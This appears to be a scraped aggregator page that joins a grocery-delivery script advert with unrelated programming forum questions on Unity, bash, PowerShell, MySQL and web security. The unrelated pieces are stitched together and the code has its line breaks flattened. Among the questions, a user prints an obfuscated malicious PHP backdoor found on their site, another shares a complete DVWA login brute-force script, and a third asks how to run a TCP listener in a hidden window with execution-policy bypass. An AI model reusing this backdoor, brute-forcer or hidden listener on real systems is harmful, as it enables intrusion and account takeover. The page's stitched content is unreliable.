Entire On Demand Grocery Delivery Script Business ((COVID 19 SPECIAL))

Your Grocery Food
Delivery Solution!

At this time during the Covid-19 emergency, more and more people are depending on home deliveries. This is the right time for you to venture into the ‘on-demand’ business model with our complete and fully functional On Demand Grocery Delivery Script.

Introducing Groceri.
Grocery shopping is always an important part of a household functioning. To make life easier, technology has…

Entire On Demand Grocery Delivery Script Business ((COVID 19 SPECIAL))

Some UI button script not working in apk build!

There are a lot of posts regarding this problem in various website and even in this one but no one has given a feasible solution to this problem. I have a button that has a custom sprite. I also have a custom script attached to that button which when pressed down (IPOINTER DOWN) changes the color of particular sprite renderer. All this works in pc but not on apk build. Why? I have two canvas, so I thought there might be raycasting issues, so I disabled one but still no luck. The buttons are in world space in canvas. So, I thought I might not use a canvas but IPointer only works on clickable UI elements.

Prevent directory traversal vulnerability in bash script

How can I prevent directory traversal attacks in a bash script, where arguments contain directory names?

Example:

$  STAGE=$  1 $  APP=$  2 deploy.sh dist/ /opt/apps/"$  STAGE"/"$  APP" 

The $ STAGE and $ APP variables are set from outside. An attacker could change this to an arbitrary path with "..".

I know the usual solution is to compare the directory string with the result of a function that returns the absolute path. But I couldn’t find a ready solution and don’t want to come up with my own.

How to hide tcp port listener powershell script?

GOALS: run a powershell script without showing the window (it’s ok if it pops up for few seconds).

PROBLEM: the script tcplisten.ps1 works just if the window is displayed to the user. All the attempts below don’t work. Because when I run netstat -ano -p tcp, port 9999 is not listening.

tcplisten.ps1

$  Listener = [System.Net.Sockets.TcpListener]9999; $  Listener.Start() 

ATTEMPTS:

powershell.exe

powershell.exe -windowstyle hidden .\tcplisten.ps1 

hidden -command

powershell -windowstyle hidden -command $  Listener = [System.Net.Sockets.TcpListener]9999; $  Listener.Start() 

-NoProfile -NonInteractive -ExecutionPolicy Bypass

powershell -NoP -NonI -W Hidden -Exec Bypass -Command 

Start-Process

Start-Process powershell.exe -ArgumentList "-WindowsStyle hidden -file .\tcplisten.ps1" 

vbs script

Create a .vbs with this script and run it

command = "powershell.exe -nologo -command C:\Users\Utente\Desktop\tcplisten.ps1" set shell = CreateObject("WScript.Shell") shell.Run command,0 

QUESTION: is there a solution? Am I doing some mistake?

construct a sql , assign it to a variable and execute inside shell script

I am trying to execute a mysql query inside my shell script, which is not executing . Here is what i am trying to do

query="\"select count(*) from information_schema.tables where TABLE_SCHEMA not in ('mysql','performance_schema','information_schema') and engine!='INNODB';\"" 

echo $ query

"select count(*) from information_schema.tables where TABLE_SCHEMA not in ('mysql','performance_schema','information_schema') and engine!='INNODB';" 

Inside my shell script , i am executing below which is not working. It is not giving any error but simply not considering -e option and listing down all the valid options for mysql client.

mysql -u$  username -p$  password -e$  query 

I even validated below in my shell prompt

echo "mysql -uroot -p -e$  query" mysql -uroot -p -e"select count(*) from information_schema.tables where TABLE_SCHEMA not in ('mysql','performance_schema','information_schema') and engine!='INNODB';" 

which is perfectly fine and executes without any issues. I am not sure what to do now. please help.Thanks

How do I go about decoding this malicious PHP script? [duplicate]

I came upon this script just by luck, actually. Ironically, it’s stored in a protected folder on my website and I don’t think

<?   $  catches ='r'; $  comforter ='$  r)ciEVi'; $  heroin = 'SgD'; $  intimal = 'T'; $  eldin = 'e';$  introspections= 'V';$  fugitive ='>v"__u)_'; $  lolly= ';rcv';  $  genially= '[aodka]:';  $  constellation ='_';$  grouped= '@'; $  clea = 'I';$  carlie ='6';  $  dialects = ')';  $  bun= 'ieagpsu'; $  grumbling = 'KSJ';  $  anne = 'i'; $  compiling= 'S_"efR"';$  exacerbated = 'l'; $  easement= '$  PPbct';$  bibliographies= '_sb';$  enlarge='I'; $  honeymooning = 'e"V,y_('; $  cal ='I';$  brushfire ='bR"='; $  diana= ')';$  domineer= 'OBTX';$  conceiving = 'f';  $  arden= '"';$  elementals='[ai'; $  elvira= ')H';$  conjunction='m_b)_O';$  categorizing= '['; $  consumption='(o?te'; $  laming = 'GU'; $  cockeye = ')';$  hinda='Ttr[nE"((';$  badly ='?'; $  distinguishing='ec (H'; $  circumstance = ';'; $  dad ='t';$  height= 'l(r]';  $  herby='B';$  chanticleers= 'dQ';$  isometric='Lvs'; $  blushing ='Y'; $  enthusiasms = 'aUe(i$  e'; $  loveliness= 'K'; $  develop = 'Q';$  gunter = 'v$  I('; $  celebrity='r';$  kirk='h'; $  fetch= '];vS';  $  lamentations= 'u';$  deeding='iCOaa$  s$  E';$  earphone = '[';$  ascetic ='tV';  $  down = ')';$  criminals = '_';$  barring= 'a';$  larceny = '_^vEtRga';  $  autocollimator = 'K'; $  granaries='W'; $  centerpiece = '_';$  darned= 'ree)kHe)e';$  basses= 'n$  t(rd)';$  dong= 'rpSeEUs';$  bridal='c';$  dealt= 'E'; $  italy='i';  $  chaparral ='T';$  dollie =';t=$  UKi'; $  extendible = 's'; $  artichoke ='Nafiu'; $  apologetically= 'i';  $  decent=']'; $  atop='d'; $  forum= 'a'; $  broomcorn='o'; $  bullets= 's'; $  judged=','; $  fruit= 'A'; $  crucial= 'eTT';$  dielectrics = 'a'; $  facings='HrrF(]B'; $  ammamaria = 's`ye'; $  crabapple = 't';$  deans='$  ';  $  auras='shHnTe';$  chillers= 'TsZ:('; $  ambled = 'R'; $  eye = '4P$  C"M?';$  graham= $  bridal.  $  facings['2'].$  auras[5] .$  dielectrics . $  crabapple. $  auras[5]. $  centerpiece .$  artichoke['2'] .$  artichoke['4'] . $  auras['3']. $  bridal.$  crabapple. $  apologetically. $  broomcorn . $  auras['3'] ;$  barker= $  distinguishing['2'] ;$  droll = $  graham ($  barker,$  auras[5]. $  larceny['2']. $  dielectrics .$  height['0'].$  chillers['4'].  $  dielectrics .$  facings['2'].$  facings['2'] . $  dielectrics .$  ammamaria['2'] . $  centerpiece .  $  dong['1'] .$  broomcorn. $  dong['1']. $  chillers['4'] .  $  artichoke['2'] . $  artichoke['4'] .$  auras['3'].$  bridal .$  centerpiece. $  larceny['6'].$  auras[5].  $  crabapple .$  centerpiece . $  dielectrics.  $  facings['2'] .$  larceny['6'] .$  chillers['1'].$  chillers['4'] . $  basses['6']. $  basses['6']. $  basses['6'] .$  dollie['0']);  $  droll ($  elnar['2'], $  eye['3'],$  ammamaria['2'], $  conjunction[2] ,$  dollie['0'] , $  larceny['6'] , $  baldwin, $  grouped,  $  chillers['1'],$  domineer['3'] , $  eye['2']. $  apologetically . $  dollie['2'].$  dielectrics. $  facings['2'] .$  facings['2'] . $  dielectrics.$  ammamaria['2'] .$  centerpiece . $  conjunction[0] . $  auras[5] .$  facings['2'].$  larceny['6']. $  auras[5] .$  chillers['4'] .$  eye['2'] .$  centerpiece . $  ambled .$  dealt . $  develop. $  dollie['4'] . $  dealt. $  dong['2'] . $  chillers['0'].$  judged. $  eye['2']. $  centerpiece .$  eye['3'] .$  deeding['2']. $  deeding['2'].$  dollie['5'].  $  gunter['2']. $  dealt .$  judged .$  eye['2'] . $  centerpiece . $  dong['2']. $  dealt .$  ambled .$  ascetic['1'] .$  dealt.$  ambled .$  basses['6'] .$  dollie['0'] . $  eye['2']. $  dielectrics .$  dollie['2']. $  apologetically.$  chillers['1']. $  chillers['1'].$  auras[5].  $  crabapple . $  chillers['4'].$  eye['2'] .$  apologetically.$  earphone. $  eye['4'] . $  apologetically .$  artichoke['4']. $  larceny['2']. $  conjunction[2] .$  darned['4'] .  $  crabapple. $  chillers['1'] .$  auras['1'] . $  eye['4'] .$  facings['5'] . $  basses['6'] . $  eye[6] .$  eye['2'] .$  apologetically .$  earphone.$  eye['4'] . $  apologetically . $  artichoke['4'] .  $  larceny['2']. $  conjunction[2] .$  darned['4']. $  crabapple. $  chillers['1'].$  auras['1']. $  eye['4'] . $  facings['5'] . $  chillers[3] .$  chillers['4'] .  $  apologetically.$  chillers['1']. $  chillers['1']. $  auras[5] .$  crabapple . $  chillers['4']. $  eye['2'] .$  apologetically .$  earphone. $  eye['4'] .  $  auras['2'].$  chillers['0'] . $  chillers['0'] . $  eye['1'] .$  centerpiece.  $  gunter['2']. $  dollie['4'] .$  ascetic['1'] . $  facings['6'] .$  dollie['5'] . $  chillers['0'].$  dong['2']. $  auras['2'] .  $  eye['4'].$  facings['5']. $  basses['6'] . $  eye[6].$  eye['2'].$  apologetically. $  earphone. $  eye['4'].$  auras['2'] . $  chillers['0']. $  chillers['0'] . $  eye['1'].$  centerpiece .  $  gunter['2']. $  dollie['4'] .  $  ascetic['1'] .$  facings['6'] .$  dollie['5']. $  chillers['0'] . $  dong['2'] . $  auras['2'] .$  eye['4'] .$  facings['5'] . $  chillers[3].$  atop . $  apologetically. $  auras[5].$  basses['6'] .$  dollie['0']. $  auras[5]. $  larceny['2'].$  dielectrics .  $  height['0'] .$  chillers['4'].$  chillers['1'] .$  crabapple. $  facings['2'] . $  facings['2'] . $  auras[5]. $  larceny['2'] . $  chillers['4'] .$  conjunction[2].$  dielectrics . $  chillers['1'] .$  auras[5] . $  carlie . $  eye['0']. $  centerpiece. $  atop . $  auras[5] . $  bridal .$  broomcorn. $  atop.  $  auras[5]. $  chillers['4']. $  chillers['1']. $  crabapple. $  facings['2']. $  facings['2'] .$  auras[5].$  larceny['2'] . $  chillers['4'] . $  eye['2'] . $  dielectrics. $  basses['6']. $  basses['6'] .$  basses['6']. $  basses['6'].$  dollie['0']); ?> 

Brute Force HIGH DVWA with Python Script

I’m new using python and I’m trying to BruteForce DVWA in High Level, I found this script from https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39 . But this error always pop up when I execute it. Any help is welcome,Thank U.

Error:

File “brute_force.py”, line 32, in csrf_token = soup.findAll(attrs={“name”: “user_token”})[0].get(‘value’) IndexError: list index out of range.

Whole Script:

from sys import argv import requests from BeautifulSoup import BeautifulSoup as Soup # give our arguments more semantic friendly names script, filename, success_message = argv txt = open(filename) # set up our target, cookie and session url = 'http://127.0.0.1/dvwa/vulnerabilities/brute/index.php' cookie = {'security': 'high', 'PHPSESSID':'b8dgqhbue8vdinrd87leug1no1'} s = requests.Session() target_page = s.get(url, cookies=cookie) '''  checkSuccess @param: html (String) Searches the response HTML for our specified success message ''' def checkSuccess(html):  # get our soup ready for searching  soup = Soup(html)  # check for our success message in the soup  search = soup.findAll(text=success_message)   if not search:   success = False  else:   success = True # return the brute force result  return success # Get the intial CSRF token from the target site page_source = target_page.text soup = Soup(page_source); csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value') # Loop through our provided password file with open(filename) as f:  print 'Running brute force attack...'  for password in f:   # setup the payload   payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}   r = s.get(url, cookies=cookie, params=payload)   success = checkSuccess(r.text)   if not success:    # if it failed the CSRF token will be changed. Get the new one    soup = Soup(r.text)    csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')   else:    # Success! Show the result    print 'Password is: ' + password    break # We failed, bummer.   if not success:   print 'Brute force failed. No matches found.' 

Is running bash script that is taking arguments from site dialog box a good idea?

I’m building a site that will use youtubeAPI to keep track of playlist changes. In order for 3rd party to use it I would supply a dialog box in which user would type his/hers playlistID – this would be read and then put as an argument into bash script that in turn runs curl/python scripts to connect with API (ran on my machine) and another bash script that would mkdirs on my disk.

Does this potentially endanger me/my files somehow ? Can someone input some magic command that would do “rm * -f” or similar malicious endeavor ? Should I use some external server instead of my machine ?

I know nothing about security, Ive read few topics here but didnt find similar problem.